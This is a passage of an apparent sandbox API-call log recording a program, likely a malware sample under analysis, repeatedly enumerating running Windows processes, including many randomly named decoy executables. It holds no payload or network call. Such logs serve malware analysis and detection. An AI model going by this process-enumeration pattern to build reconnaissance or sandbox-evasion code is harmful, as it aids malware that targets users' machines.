Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.874] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.874] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.875] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.876] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.876] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0115.877] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.877] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.878] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0115.879] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.880] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0115.881] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0115.883] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0115.884] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0115.885] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0115.886] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0115.887] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0115.889] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0115.890] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0115.891] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0115.892] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0115.893] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0115.895] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0115.896] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0115.897] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0115.898] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0115.899] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0115.901] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0116.089] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0116.090] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0116.092] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0116.094] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0116.095] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0116.097] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0116.098] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0116.100] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0116.101] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.102] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0116.104] CloseHandle (hObject=0xc4) returned 1 [0116.104] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0116.110] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0116.111] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0116.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0116.112] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0116.113] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0116.114] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0116.114] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0116.115] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0116.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0116.116] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0116.117] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.118] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.119] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.119] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.201] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0116.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.203] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0116.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.205] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0116.207] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0116.208] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0116.209] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0116.210] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0116.211] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0116.212] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0116.213] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0116.214] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0116.216] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0116.217] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0116.218] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0116.219] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0116.221] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0116.222] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0116.223] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0116.225] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0116.226] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0116.228] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0116.229] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0116.231] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0116.232] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0116.233] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0116.235] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0116.236] Process32NextW (in: hSnapshot=0xbc, 